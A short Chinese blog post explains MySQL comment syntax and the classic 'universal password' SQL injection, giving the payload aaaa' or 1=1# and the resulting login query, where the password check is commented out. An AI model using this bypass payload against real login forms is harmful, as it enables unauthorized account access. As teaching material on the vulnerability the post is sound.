21N技术博客
  • 服务器
  • VPS
  • Docker
  • Nginx
  • PHP
  • WordPress
PHP中文手册联系我们

万能密码漏洞

mysql注释方式
1 单行注释:#
第二种单行注释方式用"-- "下划线后面有一个空格
2 多行注释:/**/

万能密码

aaaa’ or 1=1#
在SQL语句用户名判断的时候。
SELECT *FROM user WHERE username=‘aaaa’ or 1=1# and userpass=‘53534554456’ #后面的就会被当成是注释,而 or 1=1恒成立 。
所以会执行成功。

在这里插入图片描述

  • 服务器
  • VPS
  • Docker
  • Nginx
  • PHP
  • WordPress
Copyright ©